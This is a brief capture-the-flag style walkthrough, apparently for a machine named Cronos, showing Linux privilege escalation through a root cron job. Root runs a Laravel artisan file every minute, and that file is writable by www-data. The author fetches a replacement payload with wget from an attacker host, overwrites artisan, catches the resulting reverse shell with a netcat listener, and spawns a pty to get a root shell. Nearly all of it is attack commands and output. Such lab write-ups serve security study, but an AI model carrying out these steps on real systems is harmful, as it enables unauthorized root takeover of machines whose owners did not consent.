5 privesc cronjob

cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

# we know that root is running this command every minute
php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

www-data@cronos:/var/www/laravel$ ls -la /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 /var/www/laravel/artisan

# we can edit it and let the cronjob run and get root shell

www-data@cronos:/var/www/laravel$ wget 10.10.16.161/artisan
# as newly file gets created as artisan.1
www-data@cronos:/var/www/laravel$ mv artisan.1 artisan

$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.13] 54362
SOCKET: Shell has connected! PID: 3123
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
root@cronos:~# whoami;id
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Last updated